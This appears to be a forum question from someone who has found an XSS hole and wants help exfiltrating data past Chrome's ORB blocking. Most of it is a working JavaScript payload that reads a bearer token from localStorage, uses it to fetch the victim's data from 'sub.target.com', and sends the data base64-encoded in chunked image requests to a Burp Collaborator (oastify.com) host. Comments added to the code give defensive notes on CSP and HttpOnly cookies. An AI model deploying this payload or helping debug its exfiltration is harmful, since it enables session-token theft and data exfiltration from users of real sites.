I have found an XSS vulnerability on a target, and I am using the code below.
The request to get data works fine and prints the user's data in the console. The request to my Burp Collaborator fails because it is being blocked by Chrome's ORB (Opaque Response Blocking):
(failed) net::ERR_BLOCKED_BY_ORB
Can anyone help me with exfiltration? I am relatively new to web security
JavaScript:
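/**
 * Return the body of an XMLHttpRequest in the form that matches its responseType.
 *
 * @param {XMLHttpRequest} xhr - request whose response should be read.
 * @returns {*} responseText for "" / "text", responseXML for "document",
 *   and xhr.response for every other responseType ("json", "blob", ...).
 */
function read_body(xhr) {
  var type = xhr.responseType;
  if (!type || type === "text") {
    return xhr.responseText;
  }
  if (type === "document") {
    return xhr.responseXML;
  }
  // XMLHttpRequest has no responseJSON property (that name belongs to jQuery's
  // jqXHR wrapper); for responseType "json" the parsed object is on xhr.response,
  // so the "json" case shares the generic fallback.
  return xhr.response;
}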
// Sends dataResponse to a hard-coded external host by encoding it into image URLs.
// The data is base64-encoded, cut into pieces of exfilChunkSize characters, and each
// piece is placed in the path of an Image() request, so the page makes one outbound
// image fetch per chunk. Returns nothing; progress is written to the console.
//
// Defensive reading: this is cross-origin image beaconing. A Content-Security-Policy
// whose img-src does not list the external host stops the browser from issuing these
// requests, and a burst of image requests with long base64-looking path segments to an
// unfamiliar host is a usable detection signal in proxy and egress logs.
function exfiltrateData(dataResponse) {
// Encode the response body and work out how many chunks it splits into
var exfilChunkSize = 2000;
var exfilData = btoa(dataResponse);
// "| 0" truncates the quotient to an integer
var numFullChunks = ((exfilData.length / exfilChunkSize) | 0);
// Despite the name, this is a count of leftover base64 characters, not bits
var remainderBits = exfilData.length % exfilChunkSize;
console.log("Starting exfiltration...");
console.log("Total data length: " + exfilData.length);
console.log("Number of full chunks: " + numFullChunks);
console.log("Remaining bits length: " + remainderBits);
// One image request per full chunk; the chunk index is the first path segment
for (var i = 0; i < numFullChunks; i++) {
console.log("Exfiltrating chunk: " + i);
var exfilChunk = exfilData.slice(exfilChunkSize * i, exfilChunkSize * (i + 1));
var downloadImage = new Image();
// Log the URL before the request is made
var url = "https://example.oastify.com/" + i + "/" + exfilChunk + ".jpg";
console.log("Exfiltrating with URL: " + url);
// Assigning src is what triggers the network request
downloadImage.src = url;
}
// The final, shorter chunk is sent under the fixed "LAST" path segment
if (remainderBits > 0) {
var exfilChunk = exfilData.slice(exfilChunkSize * numFullChunks, (exfilChunkSize * numFullChunks) + remainderBits);
var downloadImage = new Image();
// Log the URL before the request is made
var url = "https://example.oastify.com/LAST/" + exfilChunk + ".jpg";
console.log("Exfiltrating remaining bits with URL: " + url);
downloadImage.src = url;
}
console.log("Done exfiltrating chunks.");
}
// Reads the bearer token from localStorage, uses it to request the user's data from a
// hard-coded endpoint, and passes a successful response body to exfiltrateData().
// Failures are reported through console.error and alert(). Returns nothing.
//
// Defensive reading: localStorage is readable by any script running in the page's
// origin, so a token kept there is exposed to every XSS in that origin. Holding the
// session credential in an HttpOnly cookie keeps it out of script reach, and CSP
// connect-src / img-src restrictions limit where an injected script can send data.
function stealData() {
var authToken = localStorage.getItem('access_token');
if (authToken) {
// The stored value may be wrapped in double quotes; strip every '"' character
authToken = authToken.replace(/"/g, '');
// Note: this writes the token itself to the console
console.log('Cleaned token from localStorage:', authToken);
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://sub.target.com/getdata', true);
// Send cookies along with the explicit Authorization header
xhr.withCredentials = true;
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.setRequestHeader('Authorization', 'Bearer ' + authToken);
// getAllResponseHeaders() reports response headers, not request headers, and
// send() has not been called yet, so no response exists at this point; the
// "Request Headers" label is misleading.
console.log('Request Headers:', xhr.getAllResponseHeaders());
xhr.onload = function() {
// Any 2xx status counts as success
if (xhr.status >= 200 && xhr.status < 300) {
console.log('Success: ' + this.responseText);
exfiltrateData(this.responseText); // Hand the response body to the chunked sender
} else {
console.error('Request failed with status:', xhr.status, 'Response:', this.responseText);
alert('Failed: ' + this.responseText);
}
};
// Fires on a network-level failure, where no HTTP status is available
xhr.onerror = function() {
console.error('Request encountered an error.');
alert('Request error.');
};
xhr.send();
} else {
console.error('Access token not found in localStorage.');
alert('Access token not found.');
}
}
// Runs as soon as the script is evaluated
stealData();